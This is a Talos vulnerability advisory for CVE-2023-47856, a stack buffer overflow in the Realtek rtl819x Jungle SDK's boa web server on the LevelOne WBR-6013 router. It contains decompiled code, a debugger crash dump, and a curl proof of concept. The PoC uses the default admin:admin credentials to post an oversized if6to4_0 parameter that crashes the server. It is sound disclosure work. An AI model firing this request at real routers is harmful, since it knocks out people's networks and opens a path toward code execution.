CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
HIGH
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
AI Score
Confidence
High
EPSS
Percentile
17.4%
CVE-2023-47856
A stack-based buffer overflow vulnerability exists in the boa set_RadvdPrefixParam functionality of Realtek rtl819x Jungle SDK v3.4.11. A specially crafted series of network requests can lead to remote code execution. An attacker can send a sequence of requests to trigger this vulnerability.
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
LevelOne WBR-6013 RER4_A_v3411b_2T2R_LEV_09_170623
Realtek rtl819x Jungle SDK v3.4.11
rtl819x Jungle SDK - <https://www.realtek.com/en/> WBR-6013 - <https://www.level1.com/level1_en/wbr-6013-n300-wireless-router-54069103>
7.2 - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
CWE-121 - Stack-based Buffer Overflow
The WBR-0613 is a wireless router designed for home or office use. It boasts wireless speeds of up to 300Mbps. In order to enhance security it provides network isolation by allowing up to 4 SSIDs and client isolation.
This Realtek rtl819x Jungle SDK vulnerability was found while researching the Levelone WBR-6013 router. We are going to explain this vulnerability from the perspective of the WBR-6013 router.
The WBR-6013 router has a web server called boa
. The version used in the device is that of a Realtek SDK that uses boa
. One of the SDKβs API is /boafrm/formRadvd
. This API allows modifications of some parameters related to router advertisement. The function responsible for this API is boa
βs formRadvd
:
void formRadvd(request *wp, char *path, char *query)
{
[...]
radvdCfgParam_t radvdCfgParam;
[1] getRadvdInfo(&radvdCfgParam);
save_translation = get_correct_lang("Save");
save_and_apply_translation = get_correct_lang("Save & Apply");
get_correct_lang("Save & Apply");
[2] if((0 == strcmp(req_get_cstream_var(wp,"submit",""), save_translation))||(0 == strcmp(req_get_cstream_var(wp, ("save_apply"), ""), save_and_apply_translation)))
{
set_RadvdParam(wp, path, query,&radvdCfgParam);
}
[...]
}
The router advertisement information is fetched, at [1]
, in radvdCfgParam
. This function checks if, in the requestβs parameters, there is at least one key between submit
and save_apply
that satisfies the checks at [2]
. If so the set_RadvdParam
function is called with the radvdCfgParam
argument. If changes are required, the changes are performed in this struct variable and later committed in the flash. Following the set_RadvdParam
function:
int set_RadvdParam(request *wp, char *path, char *query, radvdCfgParam_t *pradvdCfgParam)
{
[...]
enable=atoi(req_get_cstream_var(wp,"enable_radvd",""));
[...]
if(enable)
{
set_RadvdInterfaceParam(wp, path, query,pradvdCfgParam);
set_RadvdPrefixParam(wp, path, query,pradvdCfgParam);
}
return 0;
}
This function will fetch the enable_radvd
requestβs parameter, if the value defined the functions set_RadvdInterfaceParam
and set_RadvdPrefixParam
are called. Following the set_RadvdPrefixParam
function:
int set_RadvdPrefixParam(request *wp, char *path, char *query, radvdCfgParam_t *pradvdCfgParam)
{
[...]
for(j=0;j<MAX_PREFIX_NUM;j++)
{
[...]
sprintf(tmpname,"if6to4_%d",j);
[3] tmpstr =req_get_cstream_var(wp,tmpname,"");
if(strcmp(pradvdCfgParam->interface.prefix[j].if6to4, tmpstr))
{
[4] strcpy(pradvdCfgParam->interface.prefix[j].if6to4, tmpstr);
}
}
return 0;
}
Here the pradvdCfgParam
variable, considering the code path shown above, will reside in the stack frame of the formRadvd
function. At [3]
the if6to4_<j>
requestβs parameter is fetched and used at [4]
to update, if necessary, the interface.prefix[j].if6to4
struct member of the pradvdCfgParam
variable.
Because no checks are performed on the size of the if6to4_<j>
requestβs parameter string, a buffer overflow can occur at [4]
in the stack variable radvdCfgParam
in the formRadvd
function. An attacker could exploit this vulnerability to achieve arbitrary code execution.
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
[ Legend: Modified register | Code | Heap | Stack | String ]
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ registers ββββ
$zero: 0x00000000 β 0x00000000
$at : 0xfffffff8 β 0xfffffff8
$v0 : 0x0000003d β 0x0000003d
$v1 : 0x00000446 β 0x00000446
$a0 : 0x004c5cc4 β 0x5454502d β 0x5454502d ("TTP-"?)
$a1 : 0x407ffae1 β 0x00000000 β 0x00000000
$a2 : 0x00000000 β 0x00000000
$a3 : 0x00000000 β 0x00000000
$t0 : 0x0000003e β 0x0000003e
$t1 : 0xbf80055c β 0xbf80055c
$t2 : 0x00000002 β 0x00000002
$t3 : 0x00000200 β 0x00000200
$t4 : 0x00000100 β 0x00000100
$t5 : 0x00000807 β 0x00000807
$t6 : 0x00000800 β 0x00000800
$t7 : 0x004b0000 β 0x004b0000
$s0 : 0x41414141 β 0x41414141 ("AAAA"?)
$s1 : 0x41414141 β 0x41414141 ("AAAA"?)
$s2 : 0x41414141 β 0x41414141 ("AAAA"?)
$s3 : 0x41414141 β 0x41414141 ("AAAA"?)
$s4 : 0x41414141 β 0x41414141 ("AAAA"?)
$s5 : 0x41414141 β 0x41414141 ("AAAA"?)
$s6 : 0x00000004 β 0x00000004
$s7 : 0x00449638 β 0x666f726d β 0x666f726d ("form"?)
$t8 : 0x004b56c0 β 0x3ff44400 β 0x28c80008 β 0x28c80008
$t9 : 0x3ff44400 β 0x28c80008 β 0x28c80008
$k0 : 0x00000000 β 0x00000000
$k1 : 0x00000000 β 0x00000000
$s8 : 0x0000005c β 0x0000005c
$pc : 0x41414141 β 0x41414141 ("AAAA"?)
$sp : 0x408004e0 β 0x41414141 β 0x41414141 ("AAAA"?)
$hi : 0x00000004 β 0x00000004
$lo : 0x0006a280 β 0x0006a280
$fir : 0x00739300 β 0x00739300
$ra : 0x41414141 β 0x41414141 ("AAAA"?)
$gp : 0x3ff875c0 β 0x6c5f636f β 0x6c5f636f ("l_co"?)
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ stack ββββ
0x408004e0β+0x0000: 0x41414141 β 0x41414141 β $sp
0x408004e4β+0x0004: 0x41414141 β 0x41414141
0x408004e8β+0x0008: 0x41414141 β 0x41414141
0x408004ecβ+0x000c: 0x41414141 β 0x41414141
0x408004f0β+0x0010: 0x41414141 β 0x41414141
0x408004f4β+0x0014: 0x41414141 β 0x41414141
0x408004f8β+0x0018: 0x41414141 β 0x41414141
0x408004fcβ+0x001c: 0x004c28d0 β 0x00000005 β 0x00000005
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ code:mips:MIPS32 ββββ
[!] Cannot disassemble from $PC
[!] Cannot access memory at address 0x41414140
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ threads ββββ
[#0] Id 1, stopped 0x41414141 in ?? (), reason: SIGSEGV
To use a specific API of the web server, because of a CSRF protection mechanism, it is necessary to load the HTML page that would call that API:
curl --user admin:admin http://<DEVICE_IP>/radvd.htm &>/dev/null
After this request it is possible to use the /boafrm/formRadvd
API:
curl -d "submit=Save&enable_radvd=1&submit-url=POC&if6to4_0=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" -X POST -H "Content-Type: application/x-www-form-urlencoded" --user admin:admin http://<DEVICE_IP>/boafrm/formRadvd
After the request the boa
process will crash. The POC uses the default admin credentials.
Realtek has provided updates software to their customers. LevelOne has declined to patch the issues in their software.
2023-12-14 - Initial Vendor Contact
2023-12-22 - Vendor Disclosure
2024-05-20 - Vendor Patch Release
2024-07-08 - Public Release
Discovered by Francesco Benvenuto of Cisco Talos.
Vulnerability Reports Next Report
TALOS-2023-1894
Previous Report
TALOS-2023-1893
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
HIGH
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
AI Score
Confidence
High
EPSS
Percentile
17.4%